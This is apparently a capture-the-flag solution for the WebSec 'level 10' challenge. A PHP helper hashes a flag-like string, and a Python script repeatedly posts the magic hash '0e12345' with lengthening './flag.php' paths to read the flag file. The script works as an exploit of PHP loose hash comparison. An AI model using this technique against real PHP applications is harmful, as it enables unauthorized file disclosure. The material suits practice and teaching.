File: LEVEL-10/try.php
<?php
$incognita = "WEBSEC{9a8247cbe6264662769c08500}";
$f = "flag.php";
$hash = "asd6asd87as6d876as8d";

var_dump(md5 ($incognita . $f . $incognita));
var_dump(md5 ($incognita . $incognita));
var_dump(substr (md5 ($incognita . $f . $incognita), 0, 8));

?>

File: LEVEL-10/try.py
import requests

prefix = "./"
while True:
    r = requests.post("http://websec.fr/level10/index.php", data={
        'hash': "0e12345",
        'f': prefix + 'flag.php'
    })

    if "WEBSEC{" in r.text:
        print(r.text)
        break

    prefix += "/"
    print("a")